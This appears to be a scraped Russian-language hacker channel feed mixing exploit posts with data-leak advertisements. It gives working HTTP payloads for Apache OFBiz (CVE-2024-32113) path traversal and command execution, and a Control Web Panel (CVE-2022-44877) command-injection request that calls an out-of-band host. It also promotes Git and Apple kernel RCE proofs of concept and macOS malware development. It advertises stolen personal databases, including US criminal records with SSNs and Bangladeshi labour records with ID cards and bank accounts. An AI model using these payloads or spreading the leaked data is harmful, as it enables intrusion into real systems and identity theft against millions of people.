1 868
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
1 868
CVE-2024-32113 Apache-OFBiz
*
POC для WIN
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POC для *NIX
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>1 868
USA criminal database
Fulltexts,rec_id,IDCaseNumber,Category,SSN,LastName,FirstName,MiddleName,Generation,DOB,BirthState,AKA1,AKA2,DOBAKA,Address1,Address2,City,State,Zip,Latitude,Longitude,Age,Hair,Eye,Height,Weight,Race,ScarsMarks,Sex,SkinTone,MilitaryService,ChargesFiledDate,OffenseDate,OffenseCode,NCICCode,OffenseDesc1,OffenseDesc2,Counts,Plea,ConvictionDate,ConvictionPlace,SentenceYYYMMDDD,ProbationYYYMMDDD,PhotoName,Court,County,Source,Disposition,DispositionDate,CourtCosts,ArrestingAgency,caseType,Fines,sourceState,sourceName,caseno,fullname,ArrestDate,ParoleDate,ReleaseDate,AdmittedDate,uid_hash
70m records
Pass:
1 868
CVE-2024-32002 GIT RCE
*
Удаленное выполнение кода в подмодулях Git.
Payload может быть активирован через рекурсивное клонирование репозитория Git.
*
POC exploit
#git #rce
1 868
tappware.com Million of Bangladesh Labour Data Leak Leaked by LAPSUS$
101 million rows 700+ National Id Cards 38gb Almost
These databases contain full personal information, such as full_name,gender,date_of_bir th,present_address,mobile,e mail,bank_account_number
1 868
CVE-2022-44877
Control Web Panel Unauth RCE
POC usage:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}
whoami.{{interactsh-url}}) HTTP/1.1
Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login1 868
😈 Разработка вредоносного ПО для MacOS: создание заготовки
В этой статье мы погрузимся в мир проектирования и разработки вредоносного ПО для macOS, которая по сути является операционной системой на основе Unix.
При исследовании внутренностей системы Apple мы воспользуемся классическим подходом с опорой на базовые знания эксплойтов, программирования на C и Python, а также знакомство с низкоуровневым языком ассемблера.
❗️ Что будет затрагиваться в статье:
- Знакомства с архитектурой macOS и с особенностями её безопасности
- Углубимся во внутреннее устройство и рассмотрим ключевые элементы: Mach API и ядро
- Создадим заготовку зловредного ПО
🗣 Ссылка на чтиво
#Malware #MacOS #SIP | 🧑💻 Этичный хакер
1 868
RCE in Apple kernel
CVE-2024-27804
#CVE #RCE #apple
Уязвимость CVE-2024-27804 нашёл Meysam Firouzi (@R00tkitSMM). Обнаружена она была в ядре в AppleAVD. Она затрагивает старые версии операционных систем Apple, включая iOS и iPadOS 17.4.1. Эта уязвимость может позволить злоумышленникам выполнить произвольный код с привилегиями ядра. В настоящее время обход SPTM для arm64e-устройств под управлением iOS и iPadOS 17 не существует, поэтому джейлбрейк с помощью этого эксплойта пока невозможен.
Затронутые версии:
iOS and iPadOS < 17.5
macOS < 14.5
watchOS < 10.5
tvOS < 17.5
Эксплуатация:
./build.sh
./panic.sh
🧩 PoC
❗️ Apple Security Update